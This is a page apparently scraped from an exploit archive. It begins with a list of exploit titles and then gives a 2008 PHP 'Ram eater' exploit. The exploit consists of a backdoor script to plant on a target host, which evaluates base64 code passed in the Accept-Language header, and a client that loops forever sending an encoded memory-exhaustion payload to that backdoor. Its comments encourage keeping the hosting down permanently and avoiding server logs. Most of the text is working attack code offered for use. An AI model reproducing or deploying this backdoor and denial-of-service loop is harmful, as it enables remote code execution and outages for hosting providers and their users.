477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
79 lines
2.9 KiB
PHP
Executable file
79 lines
2.9 KiB
PHP
Executable file
There is some kind of issue in PHP
|
|
we can run out memory even on SAFE_MODE
|
|
script simply allocate maximum of memory
|
|
and go to sleep for, let's say 9999999 seconds.
|
|
sleep() pass 'max_execution_time' setting.
|
|
|
|
<?php
|
|
/* put this one on target hosting */
|
|
if ( ! $data = @getenv('HTTP_ACCEPT_LANGUAGE'))
|
|
$data = $_SERVER['HTTP_ACCEPT_LANGUAGE'];
|
|
if ( ! preg_match('#^[a-zA-Z0-9/+]*={0,2}$#', $data))
|
|
die('no propety data');
|
|
eval(base64_decode($data));
|
|
?>
|
|
|
|
<?
|
|
/* run from another, or even the same hosting */
|
|
@ini_set('max_execution_time', 0);
|
|
@set_time_limit(0);
|
|
@ignore_user_abort(true);
|
|
|
|
$url = ''; /* url to script above on target hosting */
|
|
$port = 80;
|
|
|
|
$url = empty($_REQUEST['url']) ? $url : $_REQUEST['url'];
|
|
$port = abs(intval(empty($_REQUEST['port']) ? $url : $_REQUEST['port']));
|
|
|
|
if ( ! function_exists('fsockopen'))
|
|
die('sorry, fsockopen() function disabled :/');
|
|
|
|
?><? if ( empty($url) OR empty($port)): ?>
|
|
Ram eater sploit<br />
|
|
<form action="" method="POST">
|
|
<input type="text" name="url" value="Url to script on target hosting"
|
|
onfocus="this.value='http://'" /><br />
|
|
<input type="text" name="url" value="Port" onfocus="this.value=80" /><br
|
|
/>
|
|
<input type="Submit" value="Run" />
|
|
</form>
|
|
<? exit;endif; ?><?
|
|
|
|
if ( ! $purl = @parse_url($url))
|
|
die('sorry, parse_url() function disabled O_o');
|
|
if ( ! $hostIp = @gethostbyname($purl['host']))
|
|
die('sorry, gethostbyname() function disabled or no such host');
|
|
|
|
$exploit =
|
|
'JG1MaW1pdD0nNTEyTSc7aW5pX3NldCgnbWVtb3J5X2xpbWl0JywkbUxpbWl0KTtpZighJG1MaW1'.
|
|
'pdCA9IGluaV9nZXQoJ21lbW9yeV9saW1pdCcpKSRtTGltaXQgPSAnMk0nOyRtTGltaXRJbktiID'.
|
|
'0gc3Vic3RyKCRtTGltaXQsIDEpKjEwMjQqMC44O2ZvcigkaT0wOyRpPCRtTGltaXRJbktiOyRpK'.
|
|
'yspJG0uPXN0cl9yZXBlYXQoJ20nLDEwMjQpO3NsZWVwKDk5OTk5OTk5KTs=';
|
|
|
|
$sock = "GET {$purl['path']} HTTP/1.1\n";
|
|
$sock.= "User-Agent: Opera/9.63 (Windows NT 5.1; U; pl) Presto/2.1.1\n";
|
|
$sock.= "Host: {$purl['host']}\n";
|
|
$sock.= "Accept-Language: {$exploit}\n"; /* it will be no server LOG...
|
|
i hope... */
|
|
$sock.= "Connection: Close\n\n";
|
|
$slen = strlen($sock);
|
|
|
|
while ( true ) {
|
|
if ( ! $fp = @fsockopen($hostIp, (int)$port, $_e, $__e)) {
|
|
echo "error on fsockopen() function {$_e} {$__e}\n\n";
|
|
@sleep(5);
|
|
continue;
|
|
}
|
|
if ( ! @fwrite($fp, $sock, $slen))
|
|
echo "sorry, can\'t write data to socket\n";
|
|
@usleep(300000); /* 300ms */
|
|
fclose($fp);
|
|
echo 'X'; /* output, how many times script loop */
|
|
}
|
|
/* keep this script running until target hosting die
|
|
or leave it running if you want keep hosting down all the time
|
|
enjoy and wear your sunglasses at night :)
|
|
best regards, gogulas. */
|
|
?>
|
|
|
|
# milw0rm.com [2008-05-27]
|